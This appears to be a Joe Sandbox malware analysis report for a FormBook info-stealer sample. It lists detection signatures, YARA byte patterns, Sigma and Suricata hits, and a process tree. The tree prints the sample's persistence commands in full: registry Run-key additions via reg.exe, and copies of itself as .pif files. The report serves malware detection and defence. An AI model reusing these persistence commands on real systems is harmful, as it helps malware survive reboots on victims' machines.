Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4Ear91jgQ7.exe

Overview

General Information

Sample name:4Ear91jgQ7.exe
renamed because original name is a hash value
Original sample name:dcf2ceb7faa5754e5fb0b7db1cc23637.exe
Analysis ID:1479336
MD5:dcf2ceb7faa5754e5fb0b7db1cc23637
SHA1:0259609ed1ec649f797869ca14a7aef9f2029ffb
SHA256:9732f930cd31110f63aaf92cc17895b65303bb06a4968b127f4687270941acdd
Tags:32exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
Creates multiple autostart registry keys
Drops PE files to the document folder of the user
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses cmd line tools excessively to alter registry or file data
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 4Ear91jgQ7.exe (PID: 4416 cmdline: "C:\Users\user\Desktop\4Ear91jgQ7.exe" MD5: DCF2CEB7FAA5754E5FB0B7DB1CC23637)
    • cmd.exe (PID: 1772 cmdline: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 7108 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 3560 cmdline: cmd /c Copy "C:\Users\user\Desktop\4Ear91jgQ7.exe" "C:\Users\user\Documents\4Ear91jgQ7.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 6352 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • NQKKZTlEHzDNbnTfYhwoCSpWHN.exe (PID: 1084 cmdline: "C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • findstr.exe (PID: 4040 cmdline: "C:\Windows\SysWOW64\findstr.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • NQKKZTlEHzDNbnTfYhwoCSpWHN.exe (PID: 1600 cmdline: "C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7040 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • 4Ear91jgQ7.pif (PID: 6180 cmdline: "C:\Users\user\Documents\4Ear91jgQ7.pif" MD5: DCF2CEB7FAA5754E5FB0B7DB1CC23637)
    • cmd.exe (PID: 4852 cmdline: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 2876 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 7108 cmdline: cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 2276 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • 4Ear91jgQ7.pif (PID: 3840 cmdline: "C:\Users\user\Documents\4Ear91jgQ7.pif" MD5: DCF2CEB7FAA5754E5FB0B7DB1CC23637)
    • cmd.exe (PID: 2796 cmdline: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 4072 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 5408 cmdline: cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 5796 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 6256 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • 4Ear91jgQ7.pif.pif (PID: 6436 cmdline: "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" MD5: DCF2CEB7FAA5754E5FB0B7DB1CC23637)
    • cmd.exe (PID: 3652 cmdline: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 4368 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 5896 cmdline: cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 5632 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • 4Ear91jgQ7.pif.pif (PID: 5480 cmdline: "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" MD5: DCF2CEB7FAA5754E5FB0B7DB1CC23637)
    • cmd.exe (PID: 6552 cmdline: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 6368 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 2636 cmdline: cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 6196 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • 4Ear91jgQ7.pif.pif.pif (PID: 3596 cmdline: "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" MD5: DCF2CEB7FAA5754E5FB0B7DB1CC23637)
    • cmd.exe (PID: 6444 cmdline: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 5896 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 4092 cmdline: cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 4164 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • 4Ear91jgQ7.pif.pif.pif (PID: 5000 cmdline: "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" MD5: DCF2CEB7FAA5754E5FB0B7DB1CC23637)
    • cmd.exe (PID: 3472 cmdline: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 5796 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 3372 cmdline: cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 1088 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • 4Ear91jgQ7.pif.pif.pif.pif (PID: 6476 cmdline: "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif" MD5: DCF2CEB7FAA5754E5FB0B7DB1CC23637)
    • WerFault.exe (PID: 3376 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6476 -s 2408 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • 4Ear91jgQ7.pif.pif.pif.pif (PID: 4012 cmdline: "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif" MD5: DCF2CEB7FAA5754E5FB0B7DB1CC23637)
    • cmd.exe (PID: 4836 cmdline: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 3480 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 6848 cmdline: cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 356 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • 4Ear91jgQ7.pif.pif.pif.pif.pif (PID: 5244 cmdline: "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif" MD5: DCF2CEB7FAA5754E5FB0B7DB1CC23637)
    • cmd.exe (PID: 3616 cmdline: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 2652 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 3308 cmdline: cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000012.00000002.3323294079.0000000002F60000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000012.00000002.3323294079.0000000002F60000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2abd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1420f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000012.00000002.3320583802.0000000000950000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000012.00000002.3320583802.0000000000950000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2abd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1420f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000001B.00000002.3345359746.00000000057A0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 20 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        7.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          7.2.RegAsm.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e0d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17712:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          7.2.RegAsm.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            7.2.RegAsm.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2d2d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16912:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Documents\4Ear91jgQ7.pif, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7108, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4Ear91jgQ7
            Sigma detected: Direct Autorun Keys Modification
            Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1772, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif", ProcessId: 7108, ProcessName: reg.exe
            Sigma detected: Execution of Suspicious File Type Extension
            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\Documents\4Ear91jgQ7.pif" , CommandLine: "C:\Users\user\Documents\4Ear91jgQ7.pif" , CommandLine|base64offset|contains: , Image: C:\Users\user\Documents\4Ear91jgQ7.pif, NewProcessName: C:\Users\user\Documents\4Ear91jgQ7.pif, OriginalFileName: C:\Users\user\Documents\4Ear91jgQ7.pif, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\user\Documents\4Ear91jgQ7.pif" , ProcessId: 6180, ProcessName: 4Ear91jgQ7.pif
            Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif", CommandLine: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\4Ear91jgQ7.exe", ParentImage: C:\Users\user\Desktop\4Ear91jgQ7.exe, ParentProcessId: 4416, ParentProcessName: 4Ear91jgQ7.exe, ProcessCommandLine: cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif", ProcessId: 1772, ProcessName: cmd.exe

            Snort Signatures

            No Snort rule has matched

            Suricata Signatures

            Timestamp:2024-07-23T14:50:57.879866+0200
            SID:2855464
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-23T14:51:22.805881+0200
            SID:2855465
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-23T14:50:55.333044+0200
            SID:2855464
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-23T14:50:42.942343+0200
            SID:2855464
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-23T14:51:00.411005+0200
            SID:2855464
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-23T14:50:40.420760+0200
            SID:2855464
            Source Port:49728
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-23T14:50:45.608238+0200
            SID:2855464
            Source Port:49732
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-23T14:50:11.389671+0200
            SID:2855465
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-23T14:50:48.333694+0200
            SID:2855465
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifReversingLabs: Detection: 13%
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifReversingLabs: Detection: 13%
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifReversingLabs: Detection: 13%
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifReversingLabs: Detection: 13%
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifReversingLabs: Detection: 13%
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pifReversingLabs: Detection: 13%
            Multi AV Scanner detection for submitted file
            Source: 4Ear91jgQ7.exeReversingLabs: Detection: 13%
            Yara detected FormBook
            Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000012.00000002.3323294079.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3320583802.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.3345359746.00000000057A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2374263297.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3323096019.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3325539754.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2388313008.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifJoe Sandbox ML: detected
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifJoe Sandbox ML: detected
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pifJoe Sandbox ML: detected
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifJoe Sandbox ML: detected
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifJoe Sandbox ML: detected
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: 4Ear91jgQ7.exeJoe Sandbox ML: detected
            Source: 4Ear91jgQ7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.5:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.5:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.5:49716 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.5:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49724 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49731 version: TLS 1.2
